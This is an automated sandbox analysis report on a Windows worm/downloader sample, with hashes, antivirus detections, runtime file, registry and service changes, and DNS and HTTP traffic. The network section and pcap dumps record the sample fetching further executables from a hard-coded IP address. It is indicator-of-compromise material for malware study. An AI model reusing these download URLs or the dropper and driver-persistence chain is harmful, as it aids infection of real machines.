Analysis Date2015-01-22 03:49:14
MD51109ac5875db98037627964eadc8a121
SHA13699c08ba3aa2a12cf5ac15a9a824ff6b149a458

Static Details:

File typePE32 executable for MS Windows (console) Intel 80386 32-bit
Section.text md5: 679eecbb55c8de2e1cda1a998045634d sha1: 1cd246a4a3ab4ec14687f96eba72cd51cb4e560b size: 16384
Section.rdata md5: 28857bd294da49db3a448c63688f3fc5 sha1: a8eaa5438e79784d05ad39c308c7462eb35601d4 size: 4096
Section.data md5: 91cfd14b81d1d46eb3ba71577a1d5006 sha1: 3c0b62dda3a581888f1f5bbc14085423d6bd8c7f size: 12288
Section.tc md5: affb98fbecf2011924cac8068f306175 sha1: 978f835312efdcfc3129aa660a6641887015bd64 size: 28672
Timestamp2010-05-24 06:09:49
PEhashb4f34144870ce4b94cbfa8a9bbbadc4aeb82633e
IMPhash91875e276b8d1980a1302e07fd805895
AV360 SafeVirus.Win32.Agent.O
AVAd-AwareWin32.Viking.AR
AVAlwil (avast)Viking-CF:Win32:Viking-CF
AVArcabit (arcavir)Win32.Viking.AR
AVAuthentiumW32/Viking.A.gen!Eldorado
AVAvira (antivir)TR/Drop.Agent.26112
AVBullGuardWin32.Viking.AR
AVCA (E-Trust Ino)Win32/Viking.D
AVCAT (quickheal)W32.Agent.DP
AVClamAVWorm.Fujack-55
AVDr. WebTrojan.AVKill.31676
AVEmsisoftWin32.Viking.AR
AVEset (nod32)Win32/Agent.DP virus
AVFortinetW32/Fujacks.BF!tr
AVFrisk (f-prot)W32/Viking.A.gen!Eldorado
AVF-SecureWin32.Viking.AR
AVGrisoft (avg)Win32/Fujacks.S
AVIkarusTrojan-Downloader.Win32.Jadtre
AVK7Error Scanning File
AVKasperskyVirus.Win32.Agent.dp
AVMalwareBytesno_virus
AVMcafeeW32/Fujacks.ay
AVMicrosoft Security EssentialsVirus:Win32/Viking.NK
AVMicroWorld (escan)Win32.Viking.AR
AVRisingWin32.Agent.hn
AVSophosW32/FuzVir-A
AVSymantecW32.Loorp.A!inf
AVTrend MicroPE_JEEFO.D
AVVirusBlokAda (vba32)Virus.Win32.Koklek

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Green\SoftName ➝
NULL
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates FileC:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates FilePIPE\SfcApi
Creates FilePIPE\wkssvc
Creates FileC:\WINDOWS\system32\qmgr.dll
Creates FileC:\WINDOWS\system32\mspmsnsv.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts ServiceWmdmPmSN

Process
↳ Pid 800

Process
↳ Pid 852

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝
2
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileNtHid
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates FileC:\Documents and Settings\NetworkService\Cookies\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\09Y341EJ\desktop.ini
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\ZYQTAK8Z\desktop.ini
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\USEIANI1\desktop.ini
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\TEMP\NtHid.sys
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\WXYZC1ER\desktop.ini
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\WINDOWS\TEMP\NtHid.sys
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Mutexc:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!networkservice!cookies!
Creates Mutexc:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates ServiceNtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS209.222.14.3
Winsock DNSwww.490a-B8B5-9B8C1E870B0C.com
Winsock DNSwww.baidu.com
Winsock DNSpc1.114central.com

Process
↳ Pid 1124

Process
↳ Pid 1208

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates FileWMIDataDevice

Process
↳ Pid 1872

Process
↳ Pid 1152

Network Details:

DNSwww.a.shifen.com
Type: A
180.76.3.151
DNSpc1.114central.com
Type: A
209.222.14.3
DNSnbtj.114anhui.com
Type: A
DNSwww.baidu.com
Type: A
DNSwww.490a-B8B5-9B8C1E870B0C.com
Type: A
HTTP GEThttp://209.222.14.3/nbok01/qqtt.exe.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://209.222.14.3/nbok01/dnfTT.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://209.222.14.3/nbok01/tlTT.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1033 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1034 ➝ 209.222.14.3:80

Raw Pcap
0x00000000 (00000)   47455420 2f6e626f 6b30312f 71717474   GET /nbok01/qqtt
0x00000010 (00016)   2e657865 2e657865 20485454 502f312e   .exe.exe HTTP/1.
0x00000020 (00032)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000050 (00080)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000060 (00096)   696e646f 7773204e 5420352e 313b2053   indows NT 5.1; S
0x00000070 (00112)   56313b20 2e4e4554 20434c52 20322e30   V1; .NET CLR 2.0
0x00000080 (00128)   2e353037 3237290d 0a486f73 743a2032   .50727)..Host: 2
0x00000090 (00144)   30392e32 32322e31 342e330d 0a436f6e   09.222.14.3..Con
0x000000a0 (00160)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000b0 (00176)   6976650d 0a0d0a                       ive....

0x00000000 (00000)   47455420 2f6e626f 6b30312f 646e6654   GET /nbok01/dnfT
0x00000010 (00016)   542e6578 65204854 54502f31 2e300d0a   T.exe HTTP/1.0..
0x00000020 (00032)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x00000030 (00048)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000040 (00064)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000050 (00080)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000060 (00096)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x00000070 (00112)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x00000080 (00128)   37323729 0d0a486f 73743a20 3230392e   727)..Host: 209.
0x00000090 (00144)   3232322e 31342e33 0d0a436f 6e6e6563   222.14.3..Connec
0x000000a0 (00160)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000b0 (00176)   0d0a0d0a 0a0d0a                       .......

0x00000000 (00000)   47455420 2f6e626f 6b30312f 746c5454   GET /nbok01/tlTT
0x00000010 (00016)   2e657865 20485454 502f312e 300d0a41   .exe HTTP/1.0..A
0x00000020 (00032)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000030 (00048)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000040 (00064)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000050 (00080)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000060 (00096)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000070 (00112)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x00000080 (00128)   3237290d 0a486f73 743a2032 30392e32   27)..Host: 209.2
0x00000090 (00144)   32322e31 342e330d 0a436f6e 6e656374   22.14.3..Connect
0x000000a0 (00160)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000b0 (00176)   0a0d0a0a 0a0d0a                       .......


Strings
\
.
 
.......:

FILE
         (((((                  H
08101BB
0A0^0s0
1.1E1K1Z1h1
1!1FIpu
;13B<J<
1=>=F=
:1G1P1]1
?%?2?]?
2(2B2N2W2c2l2x2
2?3H3Q
2D2J2O2U2b1n2t2
>)>2>E>S>\>
2K2f2v2
2T2d2{2
3$30l3XkGAC
;3D;H;L
43=3B3j3p3|3
4&414]4
4%4+4G4z4
490a-B8B5-9
49-E88E-4c47-98DC
4aaf-A336-C255
4Q5e5x
5$5)56A
5!6&6/6
;!;+;5;?;C;J;P;Z;d;n;x
:5:F:Y:w:|:
6.6:6C6M6W6\6
#&>6>Cg
6RD&YP
!71767D7R7^7i7p7
7.{645FF040
7FC663
7@ip:K
?7N7T7]
8-00AA
@.&'85
{-8<8^8
>!>*>8>B>H>V>`>n>t>
9*:/$:
954E}K
@\96DBA2^
9 9[9`9g9m9s9~9
9&9/9>9Q9e9o9{9
-9;9A9F9
9ao^@q
&9kIVB
A4J4Y4_4
A67-586
abnormal program termination
ADVAPI32.dll
AE4C57'
agX \s
a Play
appmgmts.dlld
AtG@sD
"bd	WVS
browser
By4ma[w,
C0M0W0
C1E870B0C
CancelConne
 cannot be run i
CloseHandle
Copyro
<'<CP<Z<|<I
CreateFileA
CreateProcessA
crypt'c
C@}Ur:
d0h0l0p0t0x0|
D0H0L0P0T0X0\0`0;
DA-6D69-472e-8981-DBC71
@.data
default
(D/fc_oL
(.Di@`
DOMAIN error
donx:"
DOS mode.
DSUVWh
$.DT4M
dU5 B~
=&=,=D=v=
E8J8O8[8`8i8o8z8
ep1'*"/
eParam$
Esht*6
ExecuUA
ExeName
ExitProcess
Expor.exe
F??3@YAXP
fA6G*r
f+D?	D
- floating point not loaded
FreeEnvironmentStringsA
FreeEnvironmentStringsW
G| 0+020e0
GetACP
GetActiveWindow
GetCommandLineA
GetCPInfo
GetCurrentDirectoryA
GetCurrentProcess
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileType
GetLastActivePopup
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetPrivateProfileStringA
GetProcAddress
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetTempPathA
GetVersion
GetVersionExA
G|htcL
__GLOBAL_HEAP_SELECTED
h1l1.T
;hDdk h$
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
Hg/m,(
hI^HaR
-h)tyVe
Hur3'$
ifyTrLo
igVCRT
InfGma
ingCompatibil
IocSymbgT
i|tlh`
I/wput
IXR-!m
j/0@0E0R0f0
 -k 4/
kca:\lsa
KERNEL32.dll
KERNEL32.DLL
KEveny
K:\Q.pdb`q
L5PFHP7b
L7aU\Kc
LCMapStringA
LCMapStringW
LoadLibraryA
lp6a J
lstrcatA
M:d:m:
MessageBoxA
Microsoft Visual C++ Runtime Library
MSN Gam
MSVCRT.dll
__MSVCRT_HEAP_SELECT
MultiByteToWideChar
n!e-cKm&BN
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
 NT\Curr
NtQu9y
Nv`mG}
OA#k8s
oft\Wud
o@P3e4
Op-;4$
~OPEN=-
+OpsSCM
|otB.8
PathFileExistsA
>P?e?k?
Program: 
<program name unknown>
- pure virtual function call
PVh T@
pVKwOf
PWithTag`
q$A3<.
QEfY.Req
qidu.com
QQQQQQQ
\Ra7207
 `.rdat[
`.rdata
RECYCLER
RegCloseKey
RegConfig
RegCreateKeyA
.\reg.ini
RegSetValueA
RegSetValueExA
Remote
_rju@_fd
-<RoA%'_h7
RtlIoU
RtlUnwind
runtime error 
Runtime Error!
R@YuX;
S1[1`1m1
{schedsvc
SDPSRV
SetHandleCount
SHLWAPI.dll
[Sh$T@
SING error
SoftName
SOFTWARE\Green\
SOFTWARE\Mi
Sp`FFF
sSpec7
SS@SSPVSS
s_/UYY
swsocknetman1ssdp
.tcLCI0
TerminateProcess
.textVT
_This #g
!This program cannot be run in DOS mode.
T;_;i;z;
TLOSS error
tl`TDi
t|.O$/
ToFilnH
t#SSUP
tTisrv
t.;t$$t(
t$$VSS
?%_#txg
>"u:F@
	U;MhOy
uMpr.{
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
U:p:}:
#upnphostKn&s
URLDown
user32.dll
USER32.dll
@;v;{;
V3_3o3x3
V6sion\
v7Os2_qWSArcvF
VC20XC00U
Version
^Vh$T@
vieAak:m
VirtualAlloc
VirtualFree
VirtualProtect
vThfad
\v:.X$
W0YX0wx
|w9=trW*
WideCharToMultiByte
 winsta0
WmdmPmSN'Fa
Writea7
WriteFile
wsprintfA
"WWSh T@
	=x=}=
xdXD8f
 X -ibcB"
<)<.<X<i<o
xmlpbS
XPTPSW
XPVSSG
XRichS
xV.#"h
XX; tg
.y!GN&
|/Yr3Y
/YW'RB
_^][YY
YYh `@
@z}]u2o